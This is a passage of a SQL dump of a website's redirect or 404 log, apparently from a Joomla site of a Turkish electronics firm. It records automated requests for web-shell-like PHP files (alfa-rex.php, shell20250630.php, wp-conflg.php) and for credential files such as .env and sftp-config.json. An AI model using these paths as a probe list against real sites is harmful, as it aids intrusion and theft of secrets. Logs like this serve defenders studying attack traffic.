00:00:00',301),(46065,'http://mail.3s-technologies.com.tr/tr/yee.php',NULL,'','',2,0,'2025-08-30 08:42:50','0000-00-00 00:00:00',301),(46066,'http://mail.3s-technologies.com.tr/tr/zuk.php',NULL,'','',2,0,'2025-08-30 08:42:51','0000-00-00 00:00:00',301),(46067,'http://3s-technologies.com.tr/tr/dejavu.php',NULL,'','',7,0,'2025-08-30 23:02:40','0000-00-00 00:00:00',301),(46068,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/iletisim\n',NULL,'','',3,0,'2025-08-31 01:21:44','0000-00-00 00:00:00',301),(46069,'http://3s-technologies.com.tr/tr/num.php',NULL,'','',77,0,'2025-08-31 06:00:12','0000-00-00 00:00:00',301),(46070,'http://3s-technologies.com.tr/tr/sty.php',NULL,'','',35,0,'2025-08-31 06:00:13','0000-00-00 00:00:00',301),(46071,'http://3s-technologies.com.tr/tr/jpg.php',NULL,'','',7,0,'2025-08-31 06:00:14','0000-00-00 00:00:00',301),(46072,'http://3s-technologies.com.tr/tr/pn.php',NULL,'','',30,0,'2025-08-31 06:00:16','0000-00-00 00:00:00',301),(46073,'http://3s-technologies.com.tr/tr/new4.php',NULL,'','',107,0,'2025-08-31 06:00:19','0000-00-00 00:00:00',301),(46074,'http://3s-technologies.com.tr/tr/wp/sih.php',NULL,'','',4,0,'2025-08-31 06:00:20','0000-00-00 00:00:00',301),(46075,'http://3s-technologies.com.tr/tr/class-wp-header.php',NULL,'','',2,0,'2025-08-31 06:00:21','0000-00-00 00:00:00',301),(46076,'http://mail.3s-technologies.com.tr/tr/images/marvins.php',NULL,'','',2,0,'2025-08-31 13:40:43','0000-00-00 00:00:00',301),(46077,'http://mail.3s-technologies.com.tr/tr/login.php',NULL,'','',1,0,'2025-08-31 13:40:45','0000-00-00 00:00:00',301),(46078,'http://mail.3s-technologies.com.tr/tr/wp-content/plugins/wp-conflg.php',NULL,'','',2,0,'2025-08-31 13:40:47','0000-00-00 00:00:00',301),(46079,'http://mail.3s-technologies.com.tr/tr/post.php',NULL,'','',24,0,'2025-08-31 13:40:49','0000-00-00 00:00:00',301),(46080,'http://mail.3s-technologies.com.tr/tr/wp-includes/text/diff/engine/about.php',NULL,'','',32,0,'2025-08-31 13:40:53','0000-00-00 00:00:00',301),(46081,'http://mail.3s-technologies.com.tr/tr/wp-content/themes/twentytwentytwo/index.php',NULL,'','',22,0,'2025-08-31 13:40:53','0000-00-00 00:00:00',301),(46082,'http://mail.3s-technologies.com.tr/tr/wp-admin/doc.php',NULL,'','',2,0,'2025-08-31 13:40:55','0000-00-00 00:00:00',301),(46083,'http://mail.3s-technologies.com.tr/tr/wp-includes/blocks/chosen.php',NULL,'','',2,0,'2025-08-31 13:40:57','0000-00-00 00:00:00',301),(46084,'http://mail.3s-technologies.com.tr/tr/wp-content/themes/twentytwentytwo/alfa-rex.php',NULL,'','',3,0,'2025-08-31 13:40:58','0000-00-00 00:00:00',301),(46085,'http://mail.3s-technologies.com.tr/tr/wp-admin/includes/xmrlpc.php',NULL,'','',13,0,'2025-08-31 13:41:02','0000-00-00 00:00:00',301),(46086,'http://mail.3s-technologies.com.tr/tr/astab.php',NULL,'','',4,0,'2025-08-31 15:16:30','0000-00-00 00:00:00',301),(46087,'http://mail.3s-technologies.com.tr/tr/dejavu.php',NULL,'','',5,0,'2025-08-31 15:16:34','0000-00-00 00:00:00',301),(46088,'http://mail.3s-technologies.com.tr/tr/newfile.php',NULL,'','',23,0,'2025-08-31 15:16:35','0000-00-00 00:00:00',301),(46089,'http://mail.3s-technologies.com.tr/tr/file4.php',NULL,'','',28,0,'2025-08-31 15:16:39','0000-00-00 00:00:00',301),(46090,'http://mail.3s-technologies.com.tr/tr/ss.php',NULL,'','',30,0,'2025-08-31 15:16:40','0000-00-00 00:00:00',301),(46091,'http://3s-technologies.com.tr/tr/file2',NULL,'','',1,0,'2025-08-31 17:36:47','0000-00-00 00:00:00',301),(46092,'http://3s-technologies.com.tr/tr/lc.php',NULL,'','',45,0,'2025-08-31 17:36:47','0000-00-00 00:00:00',301),(46093,'http://3s-technologies.com.tr/tr/rtheq.php',NULL,'','',3,0,'2025-08-31 17:36:48','0000-00-00 00:00:00',301),(46094,'http://3s-technologies.com.tr/tr/gloomed.php',NULL,'','',1,0,'2025-08-31 17:36:49','0000-00-00 00:00:00',301),(46095,'http://3s-technologies.com.tr/tr/x35.php',NULL,'','',1,0,'2025-08-31 17:36:49','0000-00-00 00:00:00',301),(46096,'http://3s-technologies.com.tr/tr/zc-639.php',NULL,'','',1,0,'2025-08-31 17:36:52','0000-00-00 00:00:00',301),(46097,'http://3s-technologies.com.tr/tr/af32.php',NULL,'','',7,0,'2025-08-31 18:21:54','0000-00-00 00:00:00',301),(46098,'http://3s-technologies.com.tr/tr/new2.php',NULL,'','',7,0,'2025-08-31 18:21:54','0000-00-00 00:00:00',301),(46099,'http://3s-technologies.com.tr/tr/hob.php',NULL,'','',5,0,'2025-08-31 18:21:56','0000-00-00 00:00:00',301),(46100,'http://3s-technologies.com.tr/tr/ase.php',NULL,'','',2,0,'2025-08-31 18:21:57','0000-00-00 00:00:00',301),(46101,'http://3s-technologies.com.tr/tr/okk.php',NULL,'','',1,0,'2025-08-31 18:21:58','0000-00-00 00:00:00',301),(46102,'http://3s-technologies.com.tr/tr/ola.php',NULL,'','',1,0,'2025-08-31 18:22:00','0000-00-00 00:00:00',301),(46103,'http://3s-technologies.com.tr/tr/yee.php',NULL,'','',8,0,'2025-08-31 18:22:01','0000-00-00 00:00:00',301),(46104,'http://3s-technologies.com.tr/tr/msg.php',NULL,'','',3,0,'2025-08-31 18:22:02','0000-00-00 00:00:00',301),(46105,'http://3s-technologies.com.tr/tr/eru.php',NULL,'','',3,0,'2025-08-31 18:22:03','0000-00-00 00:00:00',301),(46106,'http://3s-technologies.com.tr/tr/ave.php',NULL,'','',28,0,'2025-08-31 18:22:05','0000-00-00 00:00:00',301),(46107,'http://3s-technologies.com.tr/tr/ava.php',NULL,'','',48,0,'2025-08-31 18:22:07','0000-00-00 00:00:00',301),(46108,'http://3s-technologies.com.tr/tr/pow.php',NULL,'','',2,0,'2025-08-31 18:22:08','0000-00-00 00:00:00',301),(46109,'http://3s-technologies.com.tr/tr/dds.php',NULL,'','',6,0,'2025-08-31 18:22:09','0000-00-00 00:00:00',301),(46110,'http://3s-technologies.com.tr/tr/acme.php',NULL,'','',2,0,'2025-08-31 18:22:09','0000-00-00 00:00:00',301),(46111,'http://3s-technologies.com.tr/tr/uplozyu.php',NULL,'','',4,0,'2025-08-31 18:22:20','0000-00-00 00:00:00',301),(46112,'http://3s-technologies.com.tr/tr/icon.php',NULL,'','',4,0,'2025-08-31 18:22:21','0000-00-00 00:00:00',301),(46113,'http://3s-technologies.com.tr/tr/searchl.php',NULL,'','',2,0,'2025-08-31 18:22:22','0000-00-00 00:00:00',301),(46114,'http://3s-technologies.com.tr/tr/pg.php',NULL,'','',1,0,'2025-08-31 18:46:40','0000-00-00 00:00:00',301),(46115,'http://3s-technologies.com.tr/tr/gold.php',NULL,'','',16,0,'2025-08-31 18:46:43','0000-00-00 00:00:00',301),(46116,'http://3s-technologies.com.tr/tr/file404.php',NULL,'','',2,0,'2025-08-31 18:47:06','0000-00-00 00:00:00',301),(46117,'http://3s-technologies.com.tr/tr/uk.php',NULL,'','',1,0,'2025-08-31 18:47:09','0000-00-00 00:00:00',301),(46118,'http://3s-technologies.com.tr/tr/us.php',NULL,'','',1,0,'2025-08-31 18:47:10','0000-00-00 00:00:00',301),(46119,'http://3s-technologies.com.tr/tr/co.php',NULL,'','',51,0,'2025-08-31 18:47:15','0000-00-00 00:00:00',301),(46120,'http://3s-technologies.com.tr/tr/br.php',NULL,'','',1,0,'2025-08-31 18:47:15','0000-00-00 00:00:00',301),(46121,'http://3s-technologies.com.tr/tr/365.php',NULL,'','',3,0,'2025-08-31 18:47:18','0000-00-00 00:00:00',301),(46122,'http://3s-technologies.com.tr/tr/week.php',NULL,'','',1,0,'2025-08-31 18:47:18','0000-00-00 00:00:00',301),(46123,'http://3s-technologies.com.tr/tr/year.php',NULL,'','',1,0,'2025-08-31 18:47:19','0000-00-00 00:00:00',301),(46124,'http://3s-technologies.com.tr/tr/mnt.php',NULL,'','',1,0,'2025-08-31 18:47:20','0000-00-00 00:00:00',301),(46125,'http://3s-technologies.com.tr/tr/vss.php',NULL,'','',1,0,'2025-08-31 18:47:20','0000-00-00 00:00:00',301),(46126,'http://3s-technologies.com.tr/tr/line.php',NULL,'','',1,0,'2025-08-31 18:47:22','0000-00-00 00:00:00',301),(46127,'http://3s-technologies.com.tr/tr/zen.php',NULL,'','',2,0,'2025-08-31 18:47:22','0000-00-00 00:00:00',301),(46128,'http://3s-technologies.com.tr/tr/true.php',NULL,'','',1,0,'2025-08-31 18:47:23','0000-00-00 00:00:00',301),(46129,'http://3s-technologies.com.tr/tr/now.php',NULL,'','',1,0,'2025-08-31 18:47:24','0000-00-00 00:00:00',301),(46130,'https://www.3s-technologies.com.tr/tr/a',NULL,'','',2,0,'2025-08-31 22:03:16','0000-00-00 00:00:00',301),(46131,'https://www.3s-technologies.com.tr/en/components/com_virtuemart/assets/js/fancybox/\' d.href \'',NULL,'','',1,0,'2025-08-31 22:03:28','0000-00-00 00:00:00',301),(46132,'https://www.3s-technologies.com.tr/en/plugins/content/jw_allvideos/jw_allvideos/includes/js/\'   videourl   \'',NULL,'','',2,0,'2025-08-31 22:04:46','0000-00-00 00:00:00',301),(46133,'http://www.3s-technologies.com.tr/en/about-us\n',NULL,'','',2,0,'2025-08-31 22:45:40','0000-00-00 00:00:00',301),(46134,'http://3s-technologies.com.tr/tr/.sftp.json',NULL,'http://3s-technologies.com.tr/.sftp.json','',1,0,'2025-09-01 00:15:59','0000-00-00 00:00:00',301),(46135,'http://3s-technologies.com.tr/tr/ftp-config.json',NULL,'http://3s-technologies.com.tr/ftp-config.json','',6,0,'2025-09-01 00:18:35','0000-00-00 00:00:00',301),(46136,'http://3s-technologies.com.tr/tr/.vscode/ftpconfig.json',NULL,'http://3s-technologies.com.tr/.vscode/ftpconfig.json','',1,0,'2025-09-01 00:32:19','0000-00-00 00:00:00',301),(46137,'http://3s-technologies.com.tr/tr/sftp-config-alt.json',NULL,'http://3s-technologies.com.tr/sftp-config-alt.json','',1,0,'2025-09-01 00:52:42','0000-00-00 00:00:00',301),(46138,'http://3s-technologies.com.tr/tr/.atom/remote-ftp.json',NULL,'http://3s-technologies.com.tr/.atom/remote-ftp.json','',1,0,'2025-09-01 00:55:35','0000-00-00 00:00:00',301),(46139,'http://3s-technologies.com.tr/tr/.atom/remote-sync.json',NULL,'http://3s-technologies.com.tr/.atom/remote-sync.json','',1,0,'2025-09-01 01:00:21','0000-00-00 00:00:00',301),(46140,'http://3s-technologies.com.tr/tr/ftp.json',NULL,'http://3s-technologies.com.tr/ftp.json','',3,0,'2025-09-01 01:06:05','0000-00-00 00:00:00',301),(46141,'http://3s-technologies.com.tr/tr/re.php',NULL,'','',45,0,'2025-09-01 05:12:51','0000-00-00 00:00:00',301),(46142,'https://3s-technologies.com.tr/tr/i/filters:quality(60)/f/255361/267x150/4c7521adf1/webpage-svg.svg',NULL,'https://3s-technologies.com.tr/i/filters:quality(60)/f/255361/267x150/4c7521adf1/webpage-svg.svg','',1,0,'2025-09-01 11:51:25','0000-00-00 00:00:00',301),(46143,'https://3s-technologies.com.tr/tr/account/.env',NULL,'https://3s-technologies.com.tr/account/.env','',2,0,'2025-09-01 14:47:57','0000-00-00 00:00:00',301),(46144,'https://3s-technologies.com.tr/tr/ahşap-işleme-wood-processing-120cm\n',NULL,'','',1,0,'2025-09-02 03:40:03','0000-00-00 00:00:00',301),(46145,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/kursunsuz-lehim\n',NULL,'','',2,0,'2025-09-02 10:10:20','0000-00-00 00:00:00',301),(46146,'http://3s-technologies.com.tr/tr/mws.php',NULL,'','',10,0,'2025-09-02 10:52:56','0000-00-00 00:00:00',301),(46147,'http://3s-technologies.com.tr/tr/tlkzy.php',NULL,'','',1,0,'2025-09-02 10:52:59','0000-00-00 00:00:00',301),(46148,'http://3s-technologies.com.tr/tr/tarlv.php',NULL,'','',1,0,'2025-09-02 10:53:00','0000-00-00 00:00:00',301),(46149,'http://3s-technologies.com.tr/tr/axx.php',NULL,'','',74,0,'2025-09-02 10:53:01','0000-00-00 00:00:00',301),(46150,'http://3s-technologies.com.tr/tr/cfile.php',NULL,'','',47,0,'2025-09-02 10:53:02','0000-00-00 00:00:00',301),(46151,'http://3s-technologies.com.tr/tr/sao.php',NULL,'','',2,0,'2025-09-02 10:53:04','0000-00-00 00:00:00',301),(46152,'http://3s-technologies.com.tr/tr/ez.php',NULL,'','',13,0,'2025-09-02 10:53:05','0000-00-00 00:00:00',301),(46153,'http://3s-technologies.com.tr/tr/te.php',NULL,'','',18,0,'2025-09-02 10:53:06','0000-00-00 00:00:00',301),(46154,'http://3s-technologies.com.tr/tr/super.php',NULL,'','',5,0,'2025-09-02 10:53:14','0000-00-00 00:00:00',301),(46155,'http://3s-technologies.com.tr/tr/grav.php',NULL,'','',1,0,'2025-09-02 10:53:28','0000-00-00 00:00:00',301),(46156,'http://3s-technologies.com.tr/tr/0kb.php',NULL,'','',1,0,'2025-09-02 10:53:29','0000-00-00 00:00:00',301),(46157,'http://3s-technologies.com.tr/tr/embed.php',NULL,'','',2,0,'2025-09-02 10:53:33','0000-00-00 00:00:00',301),(46158,'http://3s-technologies.com.tr/tr/users/info.php',NULL,'','',1,0,'2025-09-02 10:53:34','0000-00-00 00:00:00',301),(46159,'http://3s-technologies.com.tr/tr/word.php',NULL,'','',2,0,'2025-09-02 10:53:42','0000-00-00 00:00:00',301),(46160,'http://3s-technologies.com.tr/tr/path.php',NULL,'','',44,0,'2025-09-02 10:53:44','0000-00-00 00:00:00',301),(46161,'http://3s-technologies.com.tr/tr/wp-key.php',NULL,'','',2,0,'2025-09-02 10:53:45','0000-00-00 00:00:00',301),(46162,'http://3s-technologies.com.tr/tr/apply.php',NULL,'','',1,0,'2025-09-02 10:53:52','0000-00-00 00:00:00',301),(46163,'http://3s-technologies.com.tr/tr/helper.php',NULL,'','',4,0,'2025-09-02 10:53:58','0000-00-00 00:00:00',301),(46164,'http://3s-technologies.com.tr/tr/history.php',NULL,'','',2,0,'2025-09-02 10:54:00','0000-00-00 00:00:00',301),(46165,'http://3s-technologies.com.tr/tr/heroku.php',NULL,'','',1,0,'2025-09-02 10:54:05','0000-00-00 00:00:00',301),(46166,'https://3s-technologies.com.tr/tr/pcb-prototip-prototyping\n',NULL,'','',2,0,'2025-09-02 12:54:33','0000-00-00 00:00:00',301),(46167,'https://3s-technologies.com.tr/tr/s/files/1/0841/8217/1670/files/webpage_svg.svg',NULL,'https://3s-technologies.com.tr/s/files/1/0841/8217/1670/files/webpage_svg.svg','',1,0,'2025-09-02 14:52:46','0000-00-00 00:00:00',301),(46168,'https://3s-technologies.com.tr/en/images/stories/virtuemart/product/resized/kopyas?-gf-12ht_300x300.gif',NULL,'','',1,0,'2025-09-03 00:10:43','0000-00-00 00:00:00',301),(46169,'http://3s-technologies.com.tr/tr/pm.php',NULL,'','',12,0,'2025-09-03 06:05:34','0000-00-00 00:00:00',301),(46170,'http://3s-technologies.com.tr/tr/vxrl.php',NULL,'','',29,0,'2025-09-03 06:05:35','0000-00-00 00:00:00',301),(46171,'http://3s-technologies.com.tr/tr/gifclass.php',NULL,'','',159,0,'2025-09-03 06:05:37','0000-00-00 00:00:00',301),(46172,'http://3s-technologies.com.tr/tr/ertg.php',NULL,'','',8,0,'2025-09-03 06:05:40','0000-00-00 00:00:00',301),(46173,'http://3s-technologies.com.tr/tr/jlex3.php',NULL,'','',15,0,'2025-09-03 06:05:41','0000-00-00 00:00:00',301),(46174,'http://3s-technologies.com.tr/tr/iov.php',NULL,'','',26,0,'2025-09-03 06:05:45','0000-00-00 00:00:00',301),(46175,'http://3s-technologies.com.tr/tr/aaaa.php',NULL,'','',20,0,'2025-09-03 06:05:50','0000-00-00 00:00:00',301),(46176,'http://3s-technologies.com.tr/tr/.lajuju.php',NULL,'','',8,0,'2025-09-03 06:05:52','0000-00-00 00:00:00',301),(46177,'http://3s-technologies.com.tr/tr/ffile.php',NULL,'','',57,0,'2025-09-03 06:05:53','0000-00-00 00:00:00',301),(46178,'http://3s-technologies.com.tr/tr/trd.php',NULL,'','',15,0,'2025-09-03 06:05:54','0000-00-00 00:00:00',301),(46179,'http://3s-technologies.com.tr/tr/goh.php',NULL,'','',8,0,'2025-09-03 06:05:55','0000-00-00 00:00:00',301),(46180,'http://3s-technologies.com.tr/tr/class-t.api.php',NULL,'','',129,0,'2025-09-03 06:05:56','0000-00-00 00:00:00',301),(46181,'http://3s-technologies.com.tr/tr/tcp.php',NULL,'','',21,0,'2025-09-03 06:05:57','0000-00-00 00:00:00',301),(46182,'http://3s-technologies.com.tr/tr/ioxi.php',NULL,'','',45,0,'2025-09-03 06:05:58','0000-00-00 00:00:00',301),(46183,'http://3s-technologies.com.tr/tr/jmfi2.php',NULL,'','',45,0,'2025-09-03 06:05:59','0000-00-00 00:00:00',301),(46184,'http://3s-technologies.com.tr/tr/jjzsijpj.php',NULL,'','',3,0,'2025-09-03 06:06:01','0000-00-00 00:00:00',301),(46185,'http://3s-technologies.com.tr/tr/dex.php',NULL,'','',45,0,'2025-09-03 06:06:02','0000-00-00 00:00:00',301),(46186,'http://3s-technologies.com.tr/tr/520.php',NULL,'','',61,0,'2025-09-03 06:06:03','0000-00-00 00:00:00',301),(46187,'http://3s-technologies.com.tr/tr/lupo.php',NULL,'','',30,0,'2025-09-03 06:06:04','0000-00-00 00:00:00',301),(46188,'http://3s-technologies.com.tr/tr/wp-update.php',NULL,'','',74,0,'2025-09-03 06:06:05','0000-00-00 00:00:00',301),(46189,'http://3s-technologies.com.tr/tr/weo.php',NULL,'','',4,0,'2025-09-03 06:06:06','0000-00-00 00:00:00',301),(46190,'http://3s-technologies.com.tr/tr/krypton.php',NULL,'','',9,0,'2025-09-03 06:06:07','0000-00-00 00:00:00',301),(46191,'http://3s-technologies.com.tr/tr/bless_250808022320.php',NULL,'','',3,0,'2025-09-03 06:06:29','0000-00-00 00:00:00',301),(46192,'http://3s-technologies.com.tr/tr/zadad4dadad1.php',NULL,'','',3,0,'2025-09-03 06:06:31','0000-00-00 00:00:00',301),(46193,'http://3s-technologies.com.tr/tr/xlb2nxap.php',NULL,'','',3,0,'2025-09-03 06:06:32','0000-00-00 00:00:00',301),(46194,'http://3s-technologies.com.tr/tr/wsback.php',NULL,'','',6,0,'2025-09-03 06:06:34','0000-00-00 00:00:00',301),(46195,'http://3s-technologies.com.tr/tr/aucxcocoxo.php',NULL,'','',4,0,'2025-09-03 06:06:41','0000-00-00 00:00:00',301),(46196,'http://3s-technologies.com.tr/tr/aucxzso.php',NULL,'','',4,0,'2025-09-03 06:06:42','0000-00-00 00:00:00',301),(46197,'http://3s-technologies.com.tr/tr/cbrfo.php',NULL,'','',12,0,'2025-09-03 06:06:44','0000-00-00 00:00:00',301),(46198,'http://3s-technologies.com.tr/tr/dfre.php',NULL,'','',20,0,'2025-09-03 06:06:45','0000-00-00 00:00:00',301),(46199,'http://3s-technologies.com.tr/tr/disagimons.php',NULL,'','',3,0,'2025-09-03 06:06:46','0000-00-00 00:00:00',301),(46200,'http://3s-technologies.com.tr/tr/disagreop.php',NULL,'','',3,0,'2025-09-03 06:06:47','0000-00-00 00:00:00',301),(46201,'http://3s-technologies.com.tr/tr/uploan.php',NULL,'','',3,0,'2025-09-03 06:06:49','0000-00-00 00:00:00',301),(46202,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/wood-processing-ahşap-işleme\n',NULL,'','',1,0,'2025-09-03 06:57:27','0000-00-00 00:00:00',301),(46203,'https://www.3s-technologies.com.tr/tr/s/files/1/0841/8217/1670/files/webpage_svg.svg',NULL,'https://www.3s-technologies.com.tr/s/files/1/0841/8217/1670/files/webpage_svg.svg','',1,0,'2025-09-03 07:23:53','0000-00-00 00:00:00',301),(46204,'https://3s-technologies.com.tr/tr/img/images.ctfassets.net/h0jtq0wdx190/1esv1daojly5epln3ed4hs/a944fc006a6e6202398e20f8203db5df/landing.svg',NULL,'https://3s-technologies.com.tr/img/images.ctfassets.net/h0jtq0wdx190/1esV1dAoJly5EPLN3eD4hs/a944fc006a6e6202398e20f8203db5df/landing.svg','',3,0,'2025-09-03 10:41:10','0000-00-00 00:00:00',301),(46205,'http://mail.3s-technologies.com.tr/tr/lc.php',NULL,'','',16,0,'2025-09-03 18:19:26','0000-00-00 00:00:00',301),(46206,'http://mail.3s-technologies.com.tr/tr/cla.php',NULL,'','',38,0,'2025-09-03 18:19:29','0000-00-00 00:00:00',301),(46207,'http://mail.3s-technologies.com.tr/tr/gfile.php',NULL,'','',40,0,'2025-09-03 18:19:30','0000-00-00 00:00:00',301),(46208,'http://mail.3s-technologies.com.tr/tr/gold.php',NULL,'','',9,0,'2025-09-03 18:19:32','0000-00-00 00:00:00',301),(46209,'http://mail.3s-technologies.com.tr/tr/nc4.php',NULL,'','',24,0,'2025-09-03 18:19:35','0000-00-00 00:00:00',301),(46210,'http://mail.3s-technologies.com.tr/tr/co.php',NULL,'','',20,0,'2025-09-03 18:19:35','0000-00-00 00:00:00',301),(46211,'http://mail.3s-technologies.com.tr/tr/aua.php',NULL,'','',3,0,'2025-09-03 18:19:37','0000-00-00 00:00:00',301),(46212,'http://mail.3s-technologies.com.tr/tr/sanskrit.php',NULL,'','',29,0,'2025-09-03 18:19:38','0000-00-00 00:00:00',301),(46213,'http://mail.3s-technologies.com.tr/tr/great.php',NULL,'','',8,0,'2025-09-03 18:19:40','0000-00-00 00:00:00',301),(46214,'http://mail.3s-technologies.com.tr/tr/class9.php',NULL,'','',27,0,'2025-09-03 18:19:41','0000-00-00 00:00:00',301),(46215,'http://mail.3s-technologies.com.tr/tr/pass.php',NULL,'','',13,0,'2025-09-03 18:19:42','0000-00-00 00:00:00',301),(46216,'http://mail.3s-technologies.com.tr/tr/ot.php',NULL,'','',11,0,'2025-09-03 18:19:43','0000-00-00 00:00:00',301),(46217,'http://mail.3s-technologies.com.tr/tr/witmm.php',NULL,'','',4,0,'2025-09-03 18:19:44','0000-00-00 00:00:00',301),(46218,'http://mail.3s-technologies.com.tr/tr/lo.php',NULL,'','',14,0,'2025-09-03 18:19:45','0000-00-00 00:00:00',301),(46219,'http://mail.3s-technologies.com.tr/tr/asd67.php',NULL,'','',28,0,'2025-09-03 18:19:46','0000-00-00 00:00:00',301),(46220,'https://www.3s-technologies.com.tr/tr/ürünler\n',NULL,'','',2,0,'2025-09-03 18:27:07','0000-00-00 00:00:00',301),(46221,'http://3s-technologies.com.tr/tr/ff6.php',NULL,'','',1,0,'2025-09-04 10:30:14','0000-00-00 00:00:00',301),(46222,'http://3s-technologies.com.tr/tr/easy.php',NULL,'','',11,0,'2025-09-04 10:30:15','0000-00-00 00:00:00',301),(46223,'http://3s-technologies.com.tr/tr/uana.php',NULL,'','',10,0,'2025-09-04 10:30:16','0000-00-00 00:00:00',301),(46224,'http://3s-technologies.com.tr/tr/atombil.php',NULL,'','',12,0,'2025-09-04 10:30:17','0000-00-00 00:00:00',301),(46225,'http://3s-technologies.com.tr/tr/phpfox.php',NULL,'','',2,0,'2025-09-04 10:30:20','0000-00-00 00:00:00',301),(46226,'http://3s-technologies.com.tr/tr/x7root.php',NULL,'','',2,0,'2025-09-04 10:30:21','0000-00-00 00:00:00',301),(46227,'http://3s-technologies.com.tr/tr/warm.php7',NULL,'','',20,0,'2025-09-04 10:30:34','0000-00-00 00:00:00',301),(46228,'http://3s-technologies.com.tr/tr/release.php',NULL,'','',1,0,'2025-09-04 10:30:39','0000-00-00 00:00:00',301),(46229,'http://3s-technologies.com.tr/tr/x4.php',NULL,'','',5,0,'2025-09-04 10:31:04','0000-00-00 00:00:00',301),(46230,'http://mail.3s-technologies.com.tr/tr/pm.php',NULL,'','',8,0,'2025-09-04 11:43:30','0000-00-00 00:00:00',301),(46231,'http://mail.3s-technologies.com.tr/tr/vxrl.php',NULL,'','',14,0,'2025-09-04 11:43:31','0000-00-00 00:00:00',301),(46232,'http://mail.3s-technologies.com.tr/tr/live.php',NULL,'','',3,0,'2025-09-04 11:43:32','0000-00-00 00:00:00',301),(46233,'http://mail.3s-technologies.com.tr/tr/lux.php',NULL,'','',3,0,'2025-09-04 11:43:33','0000-00-00 00:00:00',301),(46234,'http://mail.3s-technologies.com.tr/tr/ext.php',NULL,'','',22,0,'2025-09-04 11:43:33','0000-00-00 00:00:00',301),(46235,'http://mail.3s-technologies.com.tr/tr/shorw.php',NULL,'','',6,0,'2025-09-04 11:43:34','0000-00-00 00:00:00',301),(46236,'http://mail.3s-technologies.com.tr/tr/gifclass.php',NULL,'','',77,0,'2025-09-04 11:43:35','0000-00-00 00:00:00',301),(46237,'http://mail.3s-technologies.com.tr/tr/orm.php',NULL,'','',10,0,'2025-09-04 11:43:36','0000-00-00 00:00:00',301),(46238,'http://mail.3s-technologies.com.tr/tr/a2.php',NULL,'','',74,0,'2025-09-04 11:43:37','0000-00-00 00:00:00',301),(46239,'http://mail.3s-technologies.com.tr/tr/ertg.php',NULL,'','',6,0,'2025-09-04 11:43:38','0000-00-00 00:00:00',301),(46240,'http://mail.3s-technologies.com.tr/tr/jlex3.php',NULL,'','',8,0,'2025-09-04 11:43:39','0000-00-00 00:00:00',301),(46241,'http://mail.3s-technologies.com.tr/tr/cool.php',NULL,'','',21,0,'2025-09-04 11:43:40','0000-00-00 00:00:00',301),(46242,'http://mail.3s-technologies.com.tr/tr/lol.php',NULL,'','',21,0,'2025-09-04 11:43:42','0000-00-00 00:00:00',301),(46243,'http://mail.3s-technologies.com.tr/tr/iov.php',NULL,'','',11,0,'2025-09-04 11:43:43','0000-00-00 00:00:00',301),(46244,'http://mail.3s-technologies.com.tr/tr/bolt.php',NULL,'','',84,0,'2025-09-04 11:43:44','0000-00-00 00:00:00',301),(46245,'http://mail.3s-technologies.com.tr/tr/as4aapasd.php',NULL,'','',6,0,'2025-09-04 11:43:44','0000-00-00 00:00:00',301),(46246,'http://mail.3s-technologies.com.tr/tr/w3llstore.php',NULL,'','',9,0,'2025-09-04 11:43:45','0000-00-00 00:00:00',301),(46247,'http://mail.3s-technologies.com.tr/tr/shell20250630.php',NULL,'','',6,0,'2025-09-04 11:43:46','0000-00-00 00:00:00',301),(46248,'http://mail.3s-technologies.com.tr/tr/aaaa.php',NULL,'','',10,0,'2025-09-04 11:43:47','0000-00-00 00:00:00',301),(46249,'http://mail.3s-technologies.com.tr/tr/css.php',NULL,'','',95,0,'2025-09-04 11:43:48','0000-00-00 00:00:00',301),(46250,'http://mail.3s-technologies.com.tr/tr/ffile.php',NULL,'','',37,0,'2025-09-04 11:43:49','0000-00-00 00:00:00',301),(46251,'http://mail.3s-technologies.com.tr/tr/trd.php',NULL,'','',7,0,'2025-09-04 11:43:50','0000-00-00 00:00:00',301),(46252,'http://mail.3s-technologies.com.tr/tr/goh.php',NULL,'','',6,0,'2025-09-04 11:43:51','0000-00-00 00:00:00',301),(46253,'http://mail.3s-technologies.com.tr/tr/class-t.api.php',NULL,'','',52,0,'2025-09-04 11:43:51','0000-00-00 00:00:00',301),(46254,'http://mail.3s-technologies.com.tr/tr/tcp.php',NULL,'','',10,0,'2025-09-04 11:43:52','0000-00-00 00:00:00',301),(46255,'http://mail.3s-technologies.com.tr/tr/ioxi.php',NULL,'','',19,0,'2025-09-04 11:43:53','0000-00-00 00:00:00',301),(46256,'http://mail.3s-technologies.com.tr/tr/jmfi2.php',NULL,'','',28,0,'2025-09-04 11:43:54','0000-00-00 00:00:00',301),(46257,'http://mail.3s-technologies.com.tr/tr/zwso.php',NULL,'','',48,0,'2025-09-04 11:43:55','0000-00-00 00:00:00',301),(46258,'http://mail.3s-technologies.com.tr/tr/jjzsijpj.php',NULL,'','',3,0,'2025-09-04 11:43:56','0000-00-00 00:00:00',301),(46259,'http://mail.3s-technologies.com.tr/tr/dex.php',NULL,'','',10,0,'2025-09-04 11:43:56','0000-00-00 00:00:00',301),(46260,'http://mail.3s-technologies.com.tr/tr/520.php',NULL,'','',35,0,'2025-09-04 11:43:57','0000-00-00 00:00:00',301),(46261,'http://mail.3s-technologies.com.tr/tr/lupo.php',NULL,'','',15,0,'2025-09-04 11:43:58','0000-00-00 00:00:00',301),(46262,'http://mail.3s-technologies.com.tr/tr/wp-update.php',NULL,'','',33,0,'2025-09-04 11:43:59','0000-00-00 00:00:00',301),(46263,'http://mail.3s-technologies.com.tr/tr/weo.php',NULL,'','',4,0,'2025-09-04 11:44:00','0000-00-00 00:00:00',301),(46264,'http://mail.3s-technologies.com.tr/tr/krypton.php',NULL,'','',5,0,'2025-09-04 11:44:01','0000-00-00 00:00:00',301),(46265,'http://mail.3s-technologies.com.tr/tr/atomlib.php',NULL,'','',64,0,'2025-09-04 11:44:05','0000-00-00 00:00:00',301),(46266,'http://mail.3s-technologies.com.tr/tr/php.php',NULL,'','',12,0,'2025-09-04 11:44:06','0000-00-00 00:00:00',301),(46267,'http://mail.3s-technologies.com.tr/tr/goat.php',NULL,'','',33,0,'2025-09-04 11:44:06','0000-00-00 00:00:00',301),(46268,'http://mail.3s-technologies.com.tr/tr/ez.php',NULL,'','',5,0,'2025-09-04 11:44:07','0000-00-00 00:00:00',301),(46269,'http://mail.3s-technologies.com.tr/tr/temp.php',NULL,'','',5,0,'2025-09-04 11:44:08','0000-00-00 00:00:00',301),(46270,'http://mail.3s-technologies.com.tr/tr/system_log.php',NULL,'','',39,0,'2025-09-04 11:44:12','0000-00-00 